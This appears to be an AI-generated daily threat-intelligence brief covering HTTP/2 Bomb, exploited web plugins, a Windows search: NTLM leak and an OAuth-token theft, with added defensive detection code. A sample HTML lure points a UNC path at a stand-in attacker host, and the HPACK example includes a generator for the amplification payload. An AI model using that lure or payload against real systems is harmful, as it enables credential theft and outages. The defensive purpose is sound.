ctipilot.ch

CTI Daily Brief — 2026-06-04

Type: daily
Date: 2026-06-04
Generator: Claude Opus 4.8 (`claude-opus-4-8`)
Classification: TLP:CLEAR
Language: English
Prompt: v2.60
Items: 13
CVEs: 18

0. TL;DR

  • HTTP/2 Bomb (CVE-2026-49975) exhausts a server's RAM from one connection in ~10 s — a composite of HPACK dynamic-table amplification plus Slowloris-style stream-holding that needs no authentication and works against default HTTP/2 configs. nginx (≥1.29.8) and Apache mod_http2 (v2.0.41) are patched; Microsoft IIS, Envoy and Cloudflare Pingora remained unpatched at disclosure, with a working write-up public (Calif/Codex, 2026-06-02). See § 5.
  • Magento object-injection RCE is in CISA KEV and exploited in the wild. CVE-2026-45247 in the Mirasvit Full Page Cache Warmer extension deserializes the CacheWarmer cookie with no auth → unauthenticated RCE; CISA KEV-listed and exploitation confirmed by Imperva, fix is v1.11.12 (Sansec, 2026-05-26). See § 2.
  • Two WordPress plugins under active mass-exploitation give unauthenticated admin takeover. Kirki (CVE-2026-8206, 500k installs) and Burst Statistics (CVE-2026-8181, 200k installs) — REST-API auth-bypass / password-reset hijack, thousands of attacks blocked within 24 h of disclosure (SecurityWeek, 2026-06-03). See § 2.
  • Two critical advisories hit public-sector infrastructure that defenders run themselves: an unauthenticated SSRF-to-root in Cisco Unified CM (CVE-2026-20230) and an OTP bypass in MISP (CVE-2026-10611), the threat-intel platform deployed across EU/CH national CERTs. See § 2.
  • NCSC Switzerland warns of Booking.com-fuelled WhatsApp hotel-booking phishing spoofing TWINT and Swiss bank portals, plus hotel-system account-takeover impersonation that arrives through legitimate booking channels (NCSC-CH, 2026-06-02). See § 1.
  • A shared hotel-booking SaaS breach exposed guests at 100+ Dutch, Belgian and Irish hotels, and a separate UN World Food Programme breach exposed ~600,000 Gaza households' IDs and locations — both already weaponised for follow-on fraud / physical-safety risk. See § 1.

3. Research & Investigative Reporting

Huntress: Windows `search:` URI handler leaks NTLMv2 hashes — Microsoft declines to patch

Huntress detailed an unpatched NTLMv2 leak in the Windows search: protocol handler: a crafted link whose crumb=location: parameter points at an attacker-controlled UNC path makes Windows open an outbound SMB (TCP 445) connection and hand over the user's Net-NTLMv2 challenge-response for offline cracking or relay (Huntress, 2026-06-03 · The Hacker News, 2026-06-03). The bug class is structurally identical to the Snipping Tool ms-screensketch: handler leak (CVE-2026-33829) patched in April; Huntress reported the search: variant a day later, but Microsoft declined to assign a CVE or ship a fix, assessing it as Moderate severity, below the Important/Critical threshold of its servicing bar. Forced authentication maps to T1187. The single highest-value control neutralises the whole URI-handler leak class: block outbound SMB (TCP 445/139) at the host firewall and at the perimeter for endpoints that do not need external shares, and enable Extended Protection for Authentication (EPA) on services that accept NTLM so a relayed hash cannot be replayed against them. Two caveats: a UNC target that is unreachable over SMB can fall back to WebDAV through the WebClient service (TCP 80/443), so disable WebClient where it is not needed or restrict NTLM with the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy; and a perimeter SMB block stops the leak to the internet, not to an attacker already on the internal network.
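For the mail-gateway or IR side of this item, the following is an added example, not Huntress's code: a scanner that finds search: lures whose crumb=location: value is a UNC path, which is the forced-authentication trigger described above. The sample HTML, the hostnames and the trusted-host list are constructed for the example; search-ms: is included as a sibling handler that accepts the same crumb parameter, and the assumption that a location outside the trusted list is hostile is the scanner's policy, not a fact from the advisory.

```python
"""Added example, not Huntress's code: flag search:/search-ms: links whose
crumb=location: points at a UNC path on a host outside an allow-list.
Sample HTML, hostnames and the trusted-host list are constructed."""
import html
import re
from urllib.parse import unquote

# Scheme, then everything up to whitespace, a quote or an angle bracket.
URI_RE = re.compile(r'\b(search(?:-ms)?):([^\s"\'<>]+)', re.IGNORECASE)
# \\host\share, //host/share or file://host/share -> host
UNC_RE = re.compile(r'^(?:\\\\|//|file://)([^\\/]+)(?:[\\/]|$)', re.IGNORECASE)


def crumb_locations(query):
    """Yield every crumb=location:<target> value found in a search: query string."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key.lower() == "crumb":
            value = unquote(value).strip()          # %5C%5C -> \\
            if value.lower().startswith("location:"):
                yield value[len("location:"):].strip()


def unc_host(location):
    """Host part of a UNC path or file:// URL, or None for a local path."""
    match = UNC_RE.match(location)
    return match.group(1).lower() if match else None


def find_forced_auth_links(text, trusted_hosts=()):
    """Return (scheme, host, location) for every link that would make Windows
    open an outbound SMB session to a host not in trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for match in URI_RE.finditer(html.unescape(text)):   # &amp; -> &
        scheme, query = match.groups()
        for location in crumb_locations(query):
            host = unc_host(location)
            if host and host not in trusted:
                hits.append((scheme.lower(), host, location))
    return hits


# Constructed mail body: one external lure, one link to an internal file
# server (allow-listed below) and one harmless search with no crumb.
SAMPLE_HTML = """
<p>Please review the attached invoice:</p>
<a href="search:query=invoice&amp;crumb=location:\\\\files.attacker.example\\share&amp;displayname=Invoice">Open invoice</a>
<a href="search-ms:query=report&crumb=location:%5C%5Cfs01.corp.example%5Cfinance">Q2 report</a>
<a href="search:query=cat%20pictures&displayname=Search">Harmless search</a>
"""

if __name__ == "__main__":
    for scheme, host, location in find_forced_auth_links(SAMPLE_HTML, trusted_hosts=["fs01.corp.example"]):
        print(f"forced-auth lure via {scheme}: -> {host} ({location})")
```

Run as a filter over message bodies or proxy logs; with an empty trusted list every UNC crumb is reported, which is the right default for mail arriving from outside.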

Enclave: a single debug flag left on in six Microsoft 365 Android apps allowed silent OAuth-token theft

Researchers at Enclave found a shared Android SDK across six Microsoft 365 apps shipped setIsDebugMode(true) in production, disabling the AccountManager check that restricts token sharing to trusted Microsoft apps — so any co-installed third-party app could silently obtain long-lived OAuth tokens for the signed-in Microsoft identity with no prompt (SecurityWeek, 2026-06-02 · The Hacker News, 2026-06-03). Affected: Word (CVE-2026-41101), PowerPoint (CVE-2026-41102), Excel (CVE-2026-42832), Microsoft 365 Copilot (CVE-2026-41100), Loop and OneNote — collectively billions of installs; Teams was unaffected because its flag was correctly false. Tokens granted read/write to Exchange mail, OneDrive and Calendar. Microsoft fixed all six in the 12 May 2026 cycle; no ITW reported pre-patch. Enforce minimum-version compliance for these apps via Intune/MDM on BYOD fleets and, where logs exist, review AccountManager token requests from non-Microsoft packages.

One-click GitHub OAuth-token theft via github.dev, fully disclosed with PoC; Microsoft patched 3 June

Independent researcher Ammar Askar published full details and a PoC for a one-click attack on GitHub's browser editor github.dev that extracts the victim's full-scope GitHub OAuth token (read/write to all repos, private ones included) (Ammar Askar, 2026-06-02 · The Hacker News, 2026-06-04). The attack abuses github.dev's embedded VS Code: a crafted page injects synthetic keyboard events (keydown injection) to drive the editor into silently installing a malicious workspace extension, which then reads and exfiltrates the OAuth token the editor holds (T1528); Askar notes the technique does not rely on bypassing postMessage origin validation. The token is not scoped to the repository in use. Askar disclosed one hour before publishing, citing prior silent-fix experience with Microsoft; Microsoft shipped a fix on 3 June. Until the fix is confirmed in place, avoid github.dev with untrusted extensions installed, watch GitHub audit logs for token use from unexpected IPs or user agents, and where a user is known to have opened an untrusted page while signed in, revoke and rotate that user's OAuth grants and tokens rather than waiting for anomalous use to show up.

Symantec: five-month, low-and-slow mailbox-espionage campaign against a global stock exchange

Broadcom's Symantec and Carbon Black teams documented a targeted espionage operation (Oct 2025 to Mar 2026) against a senior executive at an unnamed global stock exchange (Broadcom/Symantec, 2026-06-03 · SecurityWeek, 2026-06-03). The actor persisted with masqueraded binaries (armsvc.exe, oneservice.exe; T1036.005) and scheduled tasks, then ran a custom Aspose-based OST stealer to incrementally exfiltrate the target's entire Outlook mailbox in small batches via the Dropbox API and OneDrive Personal (T1114.001, T1567.002), deliberately connecting to hard-coded Microsoft IP addresses instead of hostnames to defeat DNS-based detection. Tooling also included FRPC, SharpDecryptPwd and Secretsdump (T1003.001). No attribution is offered; the assessed motive is intelligence collection. Detection concepts: scheduled-task creation by non-SYSTEM accounts (Security EID 4698, or Sysmon 12/13 on the TaskCache registry keys); .ost access by processes other than Outlook.exe (Security 4663 with a SACL on the Outlook profile folder, or EDR file-access telemetry; Sysmon 11 records file creation, not reads, so it only catches a staged copy of the .ost); and outbound HTTPS to Dropbox API endpoints from non-browser processes. Because the actor used hard-coded IPs, pair Sysmon 3 network connects with Sysmon 22 DNS queries and alert on TLS connections to public IPs that the connecting process never resolved.
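The three detection concepts above, written out as rules over sample telemetry. This is an added example, not Symantec's or Carbon Black's code: field names follow the Sysmon and Windows Security event schemas, but the binaries, task name, SIDs, process IDs and IP addresses are constructed, with TEST-NET addresses standing in for public cloud-storage IPs, and the process allow-lists are assumptions a real deployment would tune.

```python
"""Added example, not vendor code: three hunt rules for the mailbox-espionage
tradecraft, run over constructed Sysmon / Windows Security events."""
import ipaddress
import re
from collections import defaultdict

SYSTEM_SID = "S-1-5-18"
MAIL_CLIENTS = {"outlook.exe"}                       # assumed: only Outlook may touch .ost files
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe"}  # assumed: browsers resolve names elsewhere
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")   # pulls A records out of Sysmon 22 QueryResults


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def detect(events):
    """Return (rule, subject) findings in event order.

    Rule 1: scheduled task created by a non-SYSTEM account (Security 4698).
    Rule 2: .ost read (Security 4663, needs a SACL on the profile folder) or
            copied (Sysmon 11 FileCreate) by a process other than the mail client.
    Rule 3: HTTPS (Sysmon 3) from a non-browser process to an external IP that
            the same process never resolved via DNS (Sysmon 22): hard-coded IPs.
    """
    findings = []
    resolved = defaultdict(set)          # ProcessId -> IPs seen in its DNS answers
    for ev in events:
        src, eid = ev["source"], ev["event_id"]
        if src == "security" and eid == 4698:
            if ev["SubjectUserSid"] != SYSTEM_SID:
                findings.append(("task_by_non_system", ev["TaskName"]))
        elif (src, eid) in (("security", 4663), ("sysmon", 11)):
            path = ev.get("ObjectName") or ev.get("TargetFilename", "")
            proc = image_name(ev.get("ProcessName") or ev.get("Image", ""))
            if path.lower().endswith(".ost") and proc not in MAIL_CLIENTS:
                findings.append(("ost_access_non_outlook", proc))
        elif src == "sysmon" and eid == 22:
            resolved[ev["ProcessId"]].update(IPV4_RE.findall(ev["QueryResults"]))
        elif src == "sysmon" and eid == 3 and ev["DestinationPort"] == 443:
            proc, dst = image_name(ev["Image"]), ev["DestinationIp"]
            if (proc not in BROWSERS and not is_internal(dst)
                    and dst not in resolved[ev["ProcessId"]]):
                findings.append(("https_to_unresolved_ip", proc))
    return findings


OUTLOOK = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
EDGE = "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"

# Constructed telemetry: two benign baselines per rule plus one hit per rule.
SAMPLE_EVENTS = [
    {"source": "security", "event_id": 4698, "SubjectUserSid": "S-1-5-21-1111-2222-3333-1104",
     "TaskName": "\\OneService"},
    {"source": "security", "event_id": 4698, "SubjectUserSid": SYSTEM_SID,
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag"},
    {"source": "security", "event_id": 4663, "ProcessName": OUTLOOK,
     "ObjectName": "C:\\Users\\ceo\\AppData\\Local\\Microsoft\\Outlook\\ceo@corp.example.ost"},
    {"source": "sysmon", "event_id": 11, "Image": "C:\\ProgramData\\armsvc.exe",
     "TargetFilename": "C:\\ProgramData\\stage\\ceo.ost"},
    {"source": "sysmon", "event_id": 22, "ProcessId": 4120, "Image": EDGE,
     "QueryName": "api.dropboxapi.com", "QueryResults": "::ffff:203.0.113.19;"},
    {"source": "sysmon", "event_id": 3, "ProcessId": 4120, "Image": EDGE,
     "DestinationIp": "203.0.113.19", "DestinationPort": 443},
    {"source": "sysmon", "event_id": 22, "ProcessId": 2044, "Image": OUTLOOK,
     "QueryName": "outlook.office365.com", "QueryResults": "::ffff:203.0.113.40;"},
    {"source": "sysmon", "event_id": 3, "ProcessId": 2044, "Image": OUTLOOK,
     "DestinationIp": "203.0.113.40", "DestinationPort": 443},
    {"source": "sysmon", "event_id": 3, "ProcessId": 5288, "Image": "C:\\ProgramData\\oneservice.exe",
     "DestinationIp": "10.0.4.12", "DestinationPort": 443},          # internal: ignored
    {"source": "sysmon", "event_id": 3, "ProcessId": 5288, "Image": "C:\\ProgramData\\oneservice.exe",
     "DestinationIp": "203.0.113.77", "DestinationPort": 443},       # never resolved: hit
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, subject in run_sample():
        print(f"{rule}: {subject}")
```

Rule 3 is the one that survives the actor's hard-coded-IP trick: it does not need to know the destination, only that a non-browser process opened TLS to a public address it had not looked up. Expect noise from agents that use their own resolvers or connection pools, so build the browser/agent allow-list from your own baseline before alerting.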

4. Updates to Prior Coverage

No qualifying updates in window — every item this run is first coverage. Items already covered with no material in-window delta (e.g. Operation Dragon Weave, deep-dived 2026-06-02; the EU CRA 11 June milestone, covered in weekly 2026-W22) are not re-reported — see § 7.

5. Deep Dive — HTTP/2 Bomb (CVE-2026-49975): a single-connection memory-exhaustion DoS against every major web server

The Codex research team (Calif) published HTTP/2 Bomb, assigned CVE-2026-49975, a remote denial-of-service that takes most major web servers offline from one connection in roughly ten seconds with no authentication and against their default HTTP/2 configuration (Calif/Codex, 2026-06-02). At disclosure the researcher counted 880,000+ public-facing servers with HTTP/2 enabled on affected software — a population that includes a large share of government web portals, citizen-facing services and reverse-proxy front ends.

Mechanics — two old primitives composed into one new amplifier. The attack chains two separately documented HTTP/2 behaviours (Calif/Codex, 2026-06-02). First, HPACK dynamic-table amplification: the attacker seeds the server's header-compression table with one large entry, then references it thousands of times per request using single-byte back-references, forcing the server to reconstruct a large header set in memory for each reference. Second, Slowloris-style stream holding: the attacker keeps every allocated stream open indefinitely with a continuous trickle of WINDOW_UPDATE frames, so the reconstructed memory is never freed. Combined, a single residential connection drove an Envoy instance to exhaust about 32 GB of RAM in ~10 s. The root cause is structural: RFC 7541 §7.3 bounds dynamic-table size via SETTINGS_HEADER_TABLE_SIZE but never caps the number of references per request independently of total size, and per-stream memory lifetime is unbounded while WINDOW_UPDATE activity continues — so no in-spec setting alone closes the gap.
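To make the first primitive concrete, here is an added example rather than the Calif/Codex PoC: a minimal HPACK (RFC 7541) encoder and decoder that implements only the two representations the amplifier needs, used to count wire bytes against decoded bytes for one bomb-shaped header block, and a decoder-side field-count cap of the kind the text attributes to nginx's max_headers. The header name x-pad, the 4000-byte value, the 5000 references and the 1000-field cap are illustration values, not figures from the advisory; Huffman strings and the static table are deliberately out of scope.

```python
"""Added example, not the Calif/Codex PoC: HPACK dynamic-table amplification
measured with a toy encoder/decoder, plus a per-block field-count cap."""

STATIC_ENTRIES = 61     # size of the RFC 7541 Appendix A static table; contents unused here
ENTRY_OVERHEAD = 32     # RFC 7541 §4.1: entry size = len(name) + len(value) + 32


def encode_int(value, prefix_bits, flags=0):
    """§5.1 integer with an N-bit prefix; `flags` carries the representation bits."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def decode_int(buf, pos, prefix_bits):
    limit = (1 << prefix_bits) - 1
    value, pos = buf[pos] & limit, pos + 1
    if value < limit:
        return value, pos
    shift = 0
    while True:
        byte, pos = buf[pos], pos + 1
        value += (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return value, pos


def encode_string(data):
    return encode_int(len(data), 7) + data              # H bit clear: raw octets


def decode_string(buf, pos):
    if buf[pos] & 0x80:
        raise ValueError("Huffman-coded strings are out of scope for this example")
    length, pos = decode_int(buf, pos, 7)
    return bytes(buf[pos:pos + length]), pos + length


def literal_with_indexing(name, value):
    """§6.2.1 with a new name: the decoder must add the pair to its dynamic table."""
    return encode_int(0, 6, 0x40) + encode_string(name) + encode_string(value)


def indexed(index):
    """§6.1: a single byte for any index below 127."""
    return encode_int(index, 7, 0x80)


def bomb_block(value_len=4000, refs=5000):
    """Seed one large dynamic-table entry, then reference it `refs` times.
    Index 62 is the first dynamic-table slot (61 static entries + 1)."""
    return literal_with_indexing(b"x-pad", b"A" * value_len) + indexed(STATIC_ENTRIES + 1) * refs


class Decoder:
    def __init__(self, table_size=4096, max_fields=None):   # 4096 = default SETTINGS_HEADER_TABLE_SIZE
        self.table_size, self.max_fields = table_size, max_fields
        self.dynamic = []                                   # newest entry first

    def _add(self, name, value):
        self.dynamic.insert(0, (name, value))
        while sum(len(n) + len(v) + ENTRY_OVERHEAD for n, v in self.dynamic) > self.table_size:
            self.dynamic.pop()                              # §4.3: evict the oldest entry

    def _lookup(self, index):
        if index <= STATIC_ENTRIES:
            raise ValueError("static-table lookups are out of scope for this example")
        return self.dynamic[index - STATIC_ENTRIES - 1]

    def decode(self, block):
        """Return the decoded header list, or raise once it exceeds max_fields."""
        headers, pos = [], 0
        while pos < len(block):
            first = block[pos]
            if first & 0x80:                                # indexed header field
                index, pos = decode_int(block, pos, 7)
                name, value = self._lookup(index)
            elif first & 0xC0 == 0x40:                      # literal with incremental indexing
                index, pos = decode_int(block, pos, 6)
                name, pos = decode_string(block, pos) if index == 0 else (self._lookup(index)[0], pos)
                value, pos = decode_string(block, pos)
                self._add(name, value)
            else:
                raise ValueError("representation not covered by this example")
            headers.append((name, value))
            if self.max_fields is not None and len(headers) > self.max_fields:
                raise ValueError(f"header block exceeds {self.max_fields} fields")
        return headers


def amplification(value_len=4000, refs=5000):
    """(wire bytes, decoded bytes under §4.1 accounting) for one bomb block."""
    block = bomb_block(value_len, refs)
    headers = Decoder().decode(block)
    return len(block), sum(len(n) + len(v) + ENTRY_OVERHEAD for n, v in headers)


def rejected_by_cap(max_fields=1000, **kwargs):
    """True if a decoder with a per-block field cap refuses the bomb block."""
    try:
        Decoder(max_fields=max_fields).decode(bomb_block(**kwargs))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    wire, decoded = amplification()
    print(f"{wire} wire bytes -> {decoded} decoded bytes ({decoded // wire}x)")
    print("capped decoder rejects the block:", rejected_by_cap())
```

With the illustration values one 9 KB block decodes to roughly 20 MB of header state, a ratio above 2000:1, and the dynamic table itself stays within the default 4096-byte SETTINGS_HEADER_TABLE_SIZE the whole time, which is the point the text makes about table-size bounds alone being insufficient. The field-count check fires on the 1001st field and discards the block before the reconstruction finishes; it is the decoder-side analogue of the directive the text describes, not nginx's code.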

Affected and patched versions (vendor-stated). nginx is fixed in 1.29.8, which introduces a new max_headers directive defaulting to 1000; Apache httpd is fixed in mod_http2 v2.0.41, shipped as a standalone module release and not yet folded into a 2.4.x release at disclosure (oss-security, 2026-06-03). At initial disclosure Microsoft IIS, Envoy and Cloudflare Pingora had no patch; a 3 June update to the disclosure notes Envoy has since shipped a fix (advisory GHSA-22m2-hvr2-xqc8), leaving Microsoft IIS and Cloudflare Pingora unpatched (Calif/Codex, 2026-06-02). The disclosure was deliberately timed after nginx shipped its fix; the researcher released publicly — with mitigations — assessing that the nginx/Apache commit diffs could be turned into a working exploit quickly, so defenders needed the mitigation guidance immediately.

ATT&CK. This is availability impact through a software-flaw resource-exhaustion path — T1499.004 Endpoint Denial of Service: Application or System Exploitation, reached over application-layer protocol abuse (T1071.001).

Hardening / mitigation, by stack. nginx: upgrade to 1.29.8+ (the max_headers cap is the structural fix) or, as a stop-gap, set http2 off;. Apache: apply the mod_http2 v2.0.41 standalone release, or set Protocols http/1.1 as an interim; note that lowering LimitRequestFields is not effective here because HTTP/2 cookie crumbs are reassembled into a single Cookie header before the field count applies, so the repeated references never count against it, and only LimitRequestFieldSize, which bounds the reassembled field, reduces per-stream blast radius. Envoy: apply its 3 June fix (advisory GHSA-22m2-hvr2-xqc8). Microsoft IIS / Cloudflare Pingora (still no vendor patch): disable HTTP/2 at the edge where feasible, and apply per-worker memory limits (a cgroup memory.max, or ulimit -v on address space) so a bombed worker is OOM-killed before it exhausts the host (oss-security, 2026-06-03). After any change, verify from outside rather than trusting the config: openssl s_client -alpn h2 against the listener should report no negotiated ALPN protocol once HTTP/2 is off.

Hunt and detection concepts. The traffic signature is unusual: a spike in short HTTP/2 requests from a single source IP that drives per-worker memory consumption sharply upward while the connection count stays low relative to the memory pressure — the inverse of a classic volumetric flood (Calif/Codex, 2026-06-02). Watch for streams kept alive by WINDOW_UPDATE frames with no accompanying DATA frames, and instrument per-worker RSS so an anomalous single-connection memory climb pages before the host OOMs. No IOCs are warranted — the indicator is the behaviour, not an address.
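The traffic-shape signature above, as an added example that is not Calif/Codex tooling: a scorer over a constructed HTTP/2 frame trace of (connection, stream id, frame type, flags) tuples, the shape a proxy debug log or a pcap dissector export yields. The thresholds and the two sample connections are assumptions for illustration, and a stream is treated as parked until an END_STREAM is seen in either direction, which simplifies the real half-closed state machine.

```python
"""Added example, not vendor tooling: flag connections that park many streams
and keep them alive with WINDOW_UPDATE frames while moving no DATA."""
from collections import defaultdict

# Frame type codes from RFC 7540 §6 and the END_STREAM flag bit.
DATA, HEADERS, WINDOW_UPDATE = 0x0, 0x1, 0x8
END_STREAM = 0x1


def score_connections(frames, min_parked_streams=50, min_wu_per_data=20.0):
    """Return (connection, parked streams, WINDOW_UPDATE:DATA ratio) for each
    connection whose parked-stream count and ratio both exceed the thresholds.
    A bomb connection has many parked streams and a very high ratio; a busy
    download has many DATA frames and a ratio near or below 1."""
    stats = defaultdict(lambda: {"parked": set(), "data": 0, "wu": 0})
    for conn, stream, ftype, flags in frames:
        s = stats[conn]
        if ftype == HEADERS:
            s["parked"].add(stream)
        elif ftype == DATA:
            s["data"] += 1
        elif ftype == WINDOW_UPDATE:
            s["wu"] += 1
        if flags & END_STREAM:
            s["parked"].discard(stream)
    flagged = []
    for conn, s in stats.items():
        ratio = s["wu"] / max(s["data"], 1)        # no DATA at all still yields a finite ratio
        if len(s["parked"]) >= min_parked_streams and ratio >= min_wu_per_data:
            flagged.append((conn, len(s["parked"]), ratio))
    return flagged


def constructed_trace():
    """Two connections: a bomb-shaped one (200 parked streams fed by WINDOW_UPDATEs,
    no DATA) and an ordinary browser session (20 requests, each answered and closed).
    Addresses are TEST-NET placeholders."""
    bomb, browser = "203.0.113.9:51544", "198.51.100.23:40022"
    frames = []
    for stream in range(1, 400, 2):                            # client-initiated streams are odd
        frames.append((bomb, stream, HEADERS, 0))
        frames += [(bomb, stream, WINDOW_UPDATE, 0)] * 10
    for stream in range(1, 40, 2):
        frames.append((browser, stream, HEADERS, END_STREAM))  # GET: request ends with HEADERS
        frames += [(browser, stream, DATA, 0)] * 7             # response body
        frames.append((browser, stream, DATA, END_STREAM))
        frames.append((browser, 0, WINDOW_UPDATE, 0))          # connection-level flow control
    return frames


if __name__ == "__main__":
    for conn, parked, ratio in score_connections(constructed_trace()):
        print(f"{conn}: {parked} parked streams, WINDOW_UPDATE:DATA = {ratio:.0f}")
```

Pair the score with per-worker RSS: the connection that tops this list while a worker's memory climbs is the one to RST_STREAM or drop. Long-polling and gRPC streaming clients will legitimately park streams, so tune min_parked_streams against a baseline rather than the illustrative 50 used here.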

6. Action Items

  • Mitigate HTTP/2 Bomb on every internet-facing HTTP/2 endpoint. Upgrade nginx to ≥1.29.8, Apache to mod_http2 v2.0.41, and Envoy per its 3 June fix (GHSA-22m2-hvr2-xqc8); for Microsoft IIS and Cloudflare Pingora (still no patch) disable HTTP/2 at the edge where feasible and set per-worker memory limits so a bombed worker is OOM-killed before the host. Note LimitRequestFields is ineffective for Apache here. (§ 5)
  • Patch the actively-exploited web CVEs today. Mirasvit Cache Warmer → ≥1.11.12 or WAF-block the CacheWarmer cookie (CVE-2026-45247, KEV/ITW); WordPress Kirki → ≥6.0.7 and Burst Statistics → ≥3.4.2, then hunt for rogue admin-account creation and unauthenticated REST calls (CVE-2026-8206 / CVE-2026-8181). (§ 2)
  • Remediate the public-sector-infrastructure advisories. MISP → commit 39b3cb15 (or temporarily drop the LdapAuth.mixedAuth+require_otp combo); Cisco Unified CM → 14SU6 / Release 15 COP or disable WebDialer. (§ 2)
  • Block outbound SMB (TCP 445/139) at host and perimeter for endpoints with no external-share need — this neutralises the unpatched Windows search: URI NTLMv2 leak and the wider URI-handler forced-auth class. (§ 3)
  • Enforce minimum-version compliance for Microsoft 365 Android apps (Word/PowerPoint/Excel/Copilot/Loop/OneNote) via Intune on BYOD fleets to close the OAuth-token-theft path. (§ 3)
  • Brief Swiss staff and travel bookers on the hotel-booking-channel account-takeover phishing (legitimate-channel lures, TWINT/bank look-alikes), and add Nobitex/OFAC-designated wallet clusters to sanctions screening for any Iran-nexus extortion forensics. (§ 1)

7. Verification Notes

  • Items dropped:
    • IMA Diligence Services / Genesis ransomware (525,306 affected) — US-only firm, no confirmed CH/EU nexus, breach dated Dec 2025 surfacing now; defender value limited to a generic legacy-third-party-server audit lesson. Cut per less-is-more.
    • SafeBreach "Fake Context Alignment" Gemini Android prompt injection — genuinely fresh research (public 2026-06-03) but Google patched the classifier in Nov 2025, so the operational exposure is residual-only; cut for low time-criticality.
    • Devolutions Server DEVO-2026-0013/0014 (CVE-2026-9047 MFA bypass; CVE-2026-7325 LDAP coercion) — BSI WID-SEC-2026-1781, but no confirmed exploitation and CVSS <9, so it does not clear a § 2 inclusion gate. PAM operators should still patch to 2026.1.19.0+ / 2025.3.22.0+.
    • Progress Sitefinity CMS cluster (CVE-2026-7312 CVSS 10.0, CVE-2026-7198, CVE-2026-7201, CVE-2026-7313, CVE-2026-7195; BSI WID-SEC-2026-1783) — dropped on verification. The only reachable sources (BSI portal, Progress community advisory) render client-side and returned only empty page shells, so the technical description could not be independently confirmed; an NVD cross-check indicated CVE-2026-7312 is CWE-522 Insufficiently Protected Credentials (Sitefinity Insight credential disclosure, gated on an active Insight integration / non-default configuration) rather than the OData access-control bypass first drafted. No in-the-wild exploitation; patched in 15.4.8630 / 15.3.8531 / 15.2.8441 / 15.1.8335. DACH/EU public-sector Sitefinity operators should still apply the fixed builds; will be revisited if a fetchable vendor primary lands.
    • Operation Dragon Weave (Seqrite) — duplicate; deep-dived 2026-06-02 with no material in-window delta (same Seqrite source).
    • EU Cyber Resilience Act 11 June milestone — already covered in weekly 2026-W22 (weekly-policy); no new delta.
    • Europol IOCTA 2026 — out of window (published 2026-04-29); annual baseline retained for background only.
  • Single-source / reduced-confidence items: WFP Gaza breach — only UpGuard was reachable (The New Humanitarian primary returned 403; WFP spokesperson quotes corroborated via search). DesckVB RAT — Huntress is the sole fetched primary (research-lab IR finding). National-authority single primaries accepted under the PD-5 carve-out as the disclosing party: NCSC Switzerland (hotel phishing), US Treasury/OFAC (Nobitex). Vendor/CERT single primaries where the vendor advisory was the only reachable authoritative source: Cisco PSIRT (CVE-2026-20230); BSI CERT-Bund WID-SEC-2026-1783 for Sitefinity (Progress vendor advisory not reachable in-run).
  • Reduced confidence — aggregator/news-only sourcing: the Dutch-hotel breach (DutchNews.nl, Techzine) and the M365 Android OAuth-theft item (SecurityWeek exclusive, The Hacker News) rest on journalism rather than a reachable vendor/research primary — Hospecs has not named the upstream SaaS vendor, and Enclave's own write-up / MSRC pages were not fetched in-run. Treat the specifics as journalism-grade until a vendor primary lands.
  • Recency: standard daily, gap 24 h, window 36 h. Several items carry a 2026-06-02 primary (NCSC-CH Week 22, MISP/CIRCL, Kirki) with in-window (2026-06-03) corroboration — retained as freshest available coverage.
  • Contradictions: none surfaced.
  • EPSS note: CVE-2026-8181 (Burst Statistics) and several non-exploited cluster CVEs lacked an assigned EPSS score at fetch time (shown n/a).
  • Coverage gaps: databreaches-net (403, 4th consecutive failing run — WFP/Dutch-hotel stories covered via UpGuard/DutchNews/Techzine); inside-it-ch (403, 4th run — covered via heise/NCSC); sophos-xops (503, 4th run — no in-window alternate); cert-eu, anssi-fr (no in-window advisories); mandiant-gtig, volexity (RSS feeds stale, no in-window posts); edpb, cnil-fr, ico-uk, sec-edgar (no qualifying new enforcement/filing in window).
  • Sub-agents: all four (S1–S4, Claude Sonnet 4.6) returned within the window; no stalls.